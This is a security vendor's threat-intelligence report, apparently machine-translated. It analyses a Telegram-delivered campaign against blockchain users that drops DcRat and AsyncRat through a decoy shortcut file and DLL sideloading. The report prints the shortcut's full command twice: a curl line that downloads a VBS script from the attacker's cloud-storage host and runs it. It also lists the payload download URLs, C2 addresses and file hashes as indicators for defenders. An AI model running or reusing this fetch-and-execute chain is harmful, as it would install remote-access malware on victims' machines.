奇安信威胁情报中心

返回 TI 主页

OverviewQi'anxin Threat Intelligence Center and Skyrocket Falcon team found a group of unknown attackers are targeting blockchain customers during terminal operation, the malicious zip file is "transfer screenshot 2025.5.31.zip", the attackers spread it one-to-one through Telagram communication software, in the zip file are Lnk decoy, double-click to pop up the screenshot of the transfer record and release the White Plus Black component, memory loaded DcRat, C2 with a self-signed certificate mimicking qianxin.com.
Currently, ASRock's "Liuhe" advanced threat defense engine can block this Lnk, and we recommend customers to enable cloud checking function to find unknown threats.

Sample AnalysisThe Lnk file points to the following commands:


-
-


Cmd


C:\Windows\System32\cmd.exe /c "curl -o C:\Users\Public\aa.vbs https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\Users\Public\aa.vbs"


Download the vbs script from the remote server and start it, the content is as follows, with Chinese comments, the content is very similar to the mainstream GPT auto-generated script code:


-
-
-


Download Link
File Path
Description

https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/5CF1D461CBF74FC4A2379ACCC8D45CA7.jpg
C:\Users\Public\TokenPocket.jpg
Bait Picture

https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/C16E6F8B5A614F74A597C3F055484754.txt
C:\Users\Public\pythonw.exe
White file for loading malicious DLLs

https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/2C36BCF9295640CFB21933AE822F5D75.res
C:\Users\Public\python310.dll
Black DLL component with white signature

The decoy file is shown below:
The released black dll is digitally signed with a legitimate signature "Wuhoo Harmonious Reed Trade Co., Ltd."
The malicious code logic is in the Py_Main function, whose main function is to load a Shellcode in memory.
This Shellcode is a Loader which is used to load the final payload DCRat, C2: 103.45.68.150:80
After establishing a connection with C2, start Powershell to download the payload for the second stage:


-
-
-


Download Link
File Path
Description

https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/27391835C6744B469E35C90327E527C8.txt
C:\Users\Public\arphaCrashReport64.exe
White file for loading malicious DLLs

https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/B999853FC3464384A7E5E5B9B71147E5.res
C:\Users\Public\arphadump64.dll
Black DLL component

https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/540B0BAA3C5641EC9BF220021A16D230.ini
C:\Users\Public\arphaCrashReport64.ini
Encrypted shellcode

https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/15AD296C703E4D648CA98FED712C6C49.jpg
C:\Users\Public\photo_2024-12-07_00-24-16.jpg
Bait image

The attacker pops up another decoy image in the second stage to show that the transfer is complete:
The function of the white-on-black component in the second stage is to read arphaCrashReport64.ini, decrypt it into Shellcode, and load it into the newly created process rundll32.exe.
The Shellcode function is the same as before, loading the same payload DCRat, C2: 38.46.13.170:8080

Expanding the LineIts infrastructure used to build bitcoin selling websites, suspected to be used for fraud.
There are a small number of such sites active, and they seem to be built from the same templates:
Samples of the same origin were observed on VT, suspected to be propagated via SEO.


-
-


Md5
Filename

3cf9a8d8b7b68160d7523e60b0e43cd5
letsvpn-latest.exe

Also with a digital signature, currently logged off:
Sandbox recognized as AsyncRat, C2: 148.178.16.22:6666

SummarizeCurrently, the full line of products based on the threat intelligence data from the Qi'anxin Threat Intelligence Center, including the Qi'anxin Threat Intelligence Platform (TIP), SkyRock, SkyEye Advanced Threat Detection System, Qi'anxin NGSOC, and Qi'anxin Situational Awareness, already support the accurate detection of such attacks.

IOCFileHash-MD5：
05339834a0e7317505c74b58b19aaf0e
1b98984d2438d7a5d14b4f373b55603b
3cf9a8d8b7b68160d7523e60b0e43cd5
DcRat C2：
103.45.68.150:80|443
103.45.68.244:80|443
103.45.68.203:80|443
38.46.13.170:8080
AsyncRat C2：
148.178.16.22:6666
zl-web-images.oss-cn-shenzhen.aliyuncs.com

-	-
Cmd
C:\Windows\System32\cmd.exe /c "curl -o C:\Users\Public\aa.vbs https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\Users\Public\aa.vbs"

-	-	-
Download Link	File Path	Description
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/5CF1D461CBF74FC4A2379ACCC8D45CA7.jpg	C:\Users\Public\TokenPocket.jpg	Bait Picture
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/C16E6F8B5A614F74A597C3F055484754.txt	C:\Users\Public\pythonw.exe	White file for loading malicious DLLs
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/2C36BCF9295640CFB21933AE822F5D75.res	C:\Users\Public\python310.dll	Black DLL component with white signature

-	-	-
Download Link	File Path	Description
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/27391835C6744B469E35C90327E527C8.txt	C:\Users\Public\arphaCrashReport64.exe	White file for loading malicious DLLs
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/B999853FC3464384A7E5E5B9B71147E5.res	C:\Users\Public\arphadump64.dll	Black DLL component
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/540B0BAA3C5641EC9BF220021A16D230.ini	C:\Users\Public\arphaCrashReport64.ini	Encrypted shellcode
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/15AD296C703E4D648CA98FED712C6C49.jpg	C:\Users\Public\photo_2024-12-07_00-24-16.jpg	Bait image

-	-
Md5	Filename
3cf9a8d8b7b68160d7523e60b0e43cd5	letsvpn-latest.exe

BLOCKCHAIN MALWARE